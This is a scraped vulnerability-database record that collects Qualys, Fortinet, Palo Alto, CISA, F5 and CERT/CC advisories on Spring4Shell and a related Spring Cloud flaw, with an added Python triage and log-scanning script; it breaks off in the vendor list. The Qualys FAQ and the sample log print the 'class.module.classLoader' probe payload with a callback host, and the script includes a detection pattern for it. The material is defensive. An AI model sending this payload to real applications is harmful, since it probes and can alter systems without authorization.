Spring4Shell vulnerabilities, given the high severity of this exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506 (CVE-2022-22965) \n * QID 376508 (CVE-2022-22963) \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. 
You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets -> Containers\u201d tab, and using the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images eliminates the exposure before the image is instantiated as a container. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 or 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in which case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys Patch Management to patch Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which mitigate the known exploit without removing the underlying Spring weakness. 
Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. \n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another, unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. That vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not part of the Spring Framework. \n\nQIDs 376508 and 730418 are available to address that CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows operating systems. \n\nOn Linux systems, the detection checks whether the system has Java 9 or later and runs \u2018locate\u2019 and \u2018ls -l /proc/*/fd\u2019 to check whether one of \u2018spring-webmvc-*.jar\u2019, \u2018spring-webflux*.jar\u2019 or \u2018spring-boot*.jar\u2019 is present on the system. 
\n\nOn Windows systems, the detection uses WMI to check whether spring-webmvc, spring-webflux or spring-boot appears on the command line of a running process that uses JDK 9 or higher. \n\nContainer Sensor image scanning uses the find command to look for spring-webmvc, spring-webflux and spring-boot jars inside .war files, again together with JDK 9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not flag the vulnerability if access to /proc/*/fd is restricted, or if the spring-core or spring-beans file is embedded inside another binary such as a jar or war. \n\nFurthermore, this QID might not flag the vulnerability if the locate command is not available on the target. Targets on Java versions below 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to get a callback to the scanner using the payload: \n \n \n \"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application, which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if any of the following conditions are present: \n\n * "Do not exclude Intrusive checks" is not enabled in the Scan Option Profile. \n * This QID only checks for the vulnerability at the root URI. If the vulnerability lies in a non-root URI, the QID will not detect it. \n * Communication from the host back to the scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that sits between the host and the scanner. 
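The host-side logic described for QID 376506 and the request pattern used by QID 730416, worked through as an added example. This is not Qualys code and not the implementation of either QID: it only applies the preconditions the blog states (JDK 9+, a spring-webmvc/webflux/boot jar open in a running process, Spring Framework below 5.3.18 / 5.2.20, Tomcat below 10.0.20 / 9.0.62 / 8.5.78) and scans request lines for the `class.module.classLoader` prefix the probe uses. The `/proc/*/fd` snapshot, the `java -version` banners, the access-log lines and the IPs and paths in them are all constructed for the example; on a live Linux host the snapshot would come from `os.listdir('/proc')` plus `os.readlink` on each fd entry.

```python
import re
from urllib.parse import unquote

# Fixed releases named on the page: Spring Framework 5.3.18 / 5.2.20, Tomcat 10.0.20 / 9.0.62 / 8.5.78.
FIXED_SPRING = {"5.3": (5, 3, 18), "5.2": (5, 2, 20)}
FIXED_TOMCAT = {"10.0": (10, 0, 20), "9.0": (9, 0, 62), "8.5": (8, 5, 78)}

# Jar names the QID 376506 logic looks for under /proc/*/fd, with the version captured.
SPRING_JAR = re.compile(r"(spring-(?:webmvc|webflux|boot))-(\d+\.\d+\.\d+)[^/]*\.jar$")
# Matches both 'java version "1.8.0_312"' and 'openjdk version "11.0.14"'.
JAVA_BANNER = re.compile(r'version "(\d+)(?:\.(\d+))?')
# Parameter prefix used by the QID 730416 probe (and by in-the-wild requests).
PROBE = re.compile(r"class\.module\.classLoader", re.IGNORECASE)

# Constructed sample data (hypothetical host and log lines, not taken from the page).
SAMPLE_FDS = {
    "1234": ["/opt/tomcat/lib/catalina.jar",
             "/opt/tomcat/webapps/app/WEB-INF/lib/spring-webmvc-5.3.17.jar"],
    "2222": ["/opt/svc/lib/spring-boot-2.6.6.jar"],
}
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2022:10:00:01 +0000] "GET /app/?class.module.classLoader.resources.context.configFile=http://203.0.113.9:4444 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Apr/2022:10:00:02 +0000] "GET /app/?Class.Module.ClassLoader%2Eresources.context.configFile=x HTTP/1.1" 400 12',
    '10.0.0.6 - - [01/Apr/2022:10:00:03 +0000] "GET /app/login?user=alice HTTP/1.1" 200 1024',
]


def parse_version(text):
    """'5.3.17' -> (5, 3, 17)."""
    return tuple(int(p) for p in text.split("."))


def is_fixed(version, baseline):
    """True/False against the fixed release of the same minor line; None if the page names no baseline for it."""
    fixed = baseline.get(".".join(version.split(".")[:2]))
    return None if fixed is None else parse_version(version) >= fixed


def jdk_major(banner):
    """Major Java release from a `java -version` banner; legacy 1.x banners map to x."""
    m = JAVA_BANNER.search(banner)
    if not m:
        return None
    major = int(m.group(1))
    return int(m.group(2)) if major == 1 and m.group(2) else major


def triage(java_banner, tomcat_version, open_files):
    """Apply the page's preconditions to one host.

    open_files maps pid -> open file paths, as read from `ls -l /proc/*/fd` (constructed here).
    Returns (pid, jar, version, reason) tuples for processes that still need attention.
    """
    findings = []
    major = jdk_major(java_banner)
    if major is None or major < 9:
        return findings  # page: targets on Java below 9 are not vulnerable
    tomcat_ok = bool(is_fixed(tomcat_version, FIXED_TOMCAT)) if tomcat_version else False
    for pid, paths in open_files.items():
        for path in paths:
            m = SPRING_JAR.search(path)
            if not m:
                continue
            jar, ver = m.group(1), m.group(2)
            spring_ok = is_fixed(ver, FIXED_SPRING)
            if spring_ok is True:
                continue  # Spring itself is at or above the fixed release
            reason = "no Spring baseline for this line" if spring_ok is None else "Spring below fixed release"
            reason += "; Tomcat mitigated" if tomcat_ok else "; Tomcat not mitigated"
            findings.append((pid, jar, ver, reason))
    return findings


def suspicious_requests(log_lines):
    """Access-log lines whose URL-decoded request carries the class.module.classLoader prefix.

    Only the request line is visible here, so the same payload sent in a POST body is not
    covered; pair this with the IPS/firewall rules listed in the XDR section for that case.
    """
    return [line for line in log_lines if PROBE.search(unquote(line))]


if __name__ == "__main__":
    for hit in triage('openjdk version "11.0.14" 2022-01-18', "9.0.60", SAMPLE_FDS):
        print("host finding:", hit)
    for line in suspicious_requests(SAMPLE_LOG):
        print("probe seen:", line.split('"')[1])
```

The spring-boot jar is reported as "no Spring baseline" rather than silently passed: the page only names Spring Framework 5.x baselines, and Spring Boot jars carry their own 2.x version numbers, so they need a separate check. A patched Tomcat still leaves the Spring finding in the list with a lower-priority reason, matching the page's point that the Tomcat update only mitigates the known exploit.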
\n\n### Updates\n\n**Update \u2013 April 7** \n\nA new QID (730416), the unauthenticated check for CVE-2022-22965, was added under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**Update \u2013 April 5** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and for tracking remediation progress using Unified Dashboards and Patch Management. \n\n**Update \u2013 April 4** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and a [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux that scan the entire hard drive(s), including archives (and nested JARs), for indications that a Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See the \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. 
The Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fortinet": [{"lastseen": "2022-04-28T11:28:54", "description": "Two distinct Spring project vulnerabilities were released recently with critical CVSS scores and classified as zero-day attacks. \nThe two vulnerabilities are currently known as: \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. 
If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. \n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2022-04-25T23:29:53", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. 
The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. 
However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nIn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2022-05-19T17:43:45", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. 
Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. 
If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
[https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from 